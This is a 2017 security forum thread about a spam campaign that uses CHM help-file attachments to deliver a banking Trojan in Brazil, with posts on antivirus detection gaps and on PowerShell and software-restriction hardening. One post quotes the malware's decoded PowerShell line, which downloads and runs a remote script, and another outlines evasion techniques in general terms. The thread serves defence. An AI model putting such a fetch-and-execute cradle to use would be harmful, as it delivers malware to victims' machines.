Malware News CHM Help Files Deliver Brazilian Banking Trojan

Solarquest · Dec 20, 2017

Security researchers are warning of a new spam campaign targeting Brazilian institutions that contain Compiled HTML file attachments that are used to deliver a banking Trojan.

Spam messages contain a malicious CHM attachment called “comprovante.chm”, wrote Rodel Mendrez, senior security researcher at Trustwave in a technical write-up outlining the research.
....
...
...
The use of multiple stages of infection is a typical approach for attackers to stay under radar of AV scanners. As a matter of fact, as of this writing only 8 out of 60 AV scanners can detect it more than a month after we discovered this sample,” Mendrez said.

Solarquest · Dec 20, 2017

VirusTotal

Faybert · Dec 20, 2017

It is no longer a new banking Trojan here in Brazil, we have had many cases years ago, unfortunately.

Faybert · Dec 20, 2017

By the chart, I believe that Emsisoft, F-Secure, eScan, G Data and Arcabit, took advantage of the Bitdefender engine to detect the Banking Trojan:

Sephiroth Source · Dec 20, 2017

Here in Brazil people usually click on everything that is link, either by email, social media, etc. I've already run HMP on a notebook from a friend and the program has detected a thousand and one traces of infection ...

shmu26 · Dec 21, 2017

If this is a known malware, targeting a large country, how come the majority of AVs still cannot detect it? The malcoders must be modding it all the time.

Andy Ful · Dec 21, 2017

On the base of the article: CHM Badness Delivers a Banking Trojan , I decoded the PowerShell commands from CHM file:
.
iEx (neW-OBJECt NEt.WebClIENt).DownlOadstrINg('https://sites.google.com/site/xxxxxxxxx/load_qLwbTFMVhA.ps1')
.
So, this malware (and many other) can be stopped by setting the PowerShell to Constrained Language mode.

shmu26 · Dec 21, 2017

Andy Ful said:
by setting the PowerShell to Constrained Language mode.

This is what Hard_Configurator does, correct?

Deleted member 65228 · Dec 21, 2017

shmu26 said:
If this is a known malware, targeting a large country, how come the majority of AVs still cannot detect it? The malcoders must be modding it all the time.

Problem between static and dynamic.

Some vendors might have a good memory scanner, others might not. A memory scanner could allow normal generic signatures to detect malicious code based on patterns even if the sample was packed, after it had decrypted (unpacked) itself in memory. Although, some vendors might just refer to "memory scanning" as detecting process start-up and applying normal scanning to the image on disk for that newly starting process.

Another example would be general dynamic analysis. One vendor might intercept behavior and use this to flag as suspicious/malicious or not, whereas another vendor might not.

So when you have a well-made malware sample in the wild, especially something sensitive like targeting bank credential theft, the detection results will vary. If checksum hash detection flags a sample, one update to the sample will eradicate the detection's. If generic signatures are applied to flag the sample, packing will eradicate the detection's for the vendors that don't have a good memory scanner. Even if a product has a good memory scanner, a malware author might re-update the malware to exploit a vulnerability in the memory scanner (e.g. put the scanner off-guard in the wrong direction, find a way to trap the scanning, etc.).

And then you have metamorphism... Which is "re-programming". So every-time the malware becomes active, code execution is slightly different each time. This can be used to evade detection sometimes very well, as long as it is implemented and handled very well. However metamorphism can be extremely sophisticated when being done correctly, something that 99% malware authors cannot do properly under a general scenario. Used to be quite popular with virus infections though, where the injected code into the affected documents would differ for each/each set of documents targeted.

Oh, and then you also have instruction virtualisation when dealing with Assembly. Heavens Gate to execute 64-bit code from an 32-bit compiled process running on a 64-bit environment may also evade Anti-Virus software depending on the capabilities of the currently tested product, and so on.

So there are just so many of different reasons that a product may flag or not under different circumstances. It depends on the malware authors skill-set, the sample itself (what it is for, how it works) and how the security product being tested against the product works (e.g. capabilities it has, measures it takes to do this and that, etc.).

Andy Ful · Dec 21, 2017

shmu26 said:
This is what Hard_Configurator does, correct?

Yes, in recommended settings. It follows from the fact, that Software Restriction Policies in default-deny settings automatically set PowerShell to Constrained Language mode.
Yet, this can be also applied using a simple reg tweak.

Constrained Language restricts PowerShell, so for example, it cannot use advanced PowerShell commands (like New-Object Net.WebClient) to download something from the Internet. Some malware can be compiled to use PowerShell via System.Management.Automation.dll (not using powershell.exe at all), but they can be stopped by Constrained Language setting, too.
Constrained Language mode can stop most of the attack tools based on PowerShell (Metasploit, etc).
.
Edit.
Important for Windows 7 users who want to set PowerShell to Constrained Language mode (see point 4 in the below post):
How-to Guide - How do you secure PowerShell?

shmu26 · Dec 21, 2017

Andy Ful said:
Yes, in recommended settings. It follows from the fact, that Software Restriction Policies in default-deny settings automatically set PowerShell to Constrained Language mode.
Yet, this can be also applied using a simple reg tweak.
Constrained Language restricts PowerShell, so for example, it cannot use advanced PowerShell commands (like New-Object Net.WebClient) to download something from the Internet. Some malware can be compiled to use PowerShell via System.Management.Automation.dll (not using powershell.exe at all), but they can be stopped by Constrained Language setting, too.
Constrained Language mode can stop most of the attack tools based on PowerShell (Metasploit, etc).

I don't have SRP enabled in hard_configurator, but I have enabled "no powershell exec". Does this accomplish the same purpose?

Solarquest · Dec 21, 2017

In VT still only 15/59.

The article above as the trustwave one below provide good information on how and why the malware managed to stay under the radar for so long.

CHM Badness Delivers a Banking Trojan

Andy Ful · Dec 22, 2017

shmu26 said:
I don't have SRP enabled in hard_configurator, but I have enabled "no powershell exec". Does this accomplish the same purpose?

No, those are different settings. The better way is using recommended Hard_Configurator settings, and add global whitelisting for EXE and MSI files + whitelisting the TEMP folder in your UserProfile:
<Whitelist By Path> <Add Path*Wildcards> --> *.exe
<Whitelist By Path> <Add Path*Wildcards> --> *.msi
<Whitelist By Path> <Add Folder> --> choose the TEMP folder in your UserProfile. (...AppData\Local\Temp)
Now, you can use EXE and MSI files as usual.
This will give you Constrained Language mode and you can also selectively block sponsors (bitsadmin.exe, powershell.exe, powershell_ise.exe, etc.). Additionally SRP will block running by the user files with dangerous extensions (BAT, CHM, SCR, JAR, etc.) .
SRP will stop the banking trojan by dangerous file extension (CHM).

Search

Malware News CHM Help Files Deliver Brazilian Banking Trojan

Solarquest

Moderator

Solarquest

Moderator

Faybert

Level 24

Faybert

Level 24

Sephiroth Source

Level 2

shmu26

Level 85

Andy Ful

From Hard_Configurator Tools

shmu26

Level 85

Deleted member 65228

Andy Ful

From Hard_Configurator Tools

shmu26

Level 85

Solarquest

Moderator

Andy Ful

From Hard_Configurator Tools

Similar threads